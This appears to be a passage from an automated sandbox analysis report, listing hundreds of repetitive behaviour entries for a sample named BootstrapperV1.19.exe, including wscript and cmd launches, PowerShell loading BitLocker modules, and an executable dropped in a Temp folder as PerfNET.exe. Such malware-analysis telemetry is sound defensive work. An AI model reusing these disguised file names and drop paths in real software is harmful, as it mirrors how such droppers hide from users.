                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
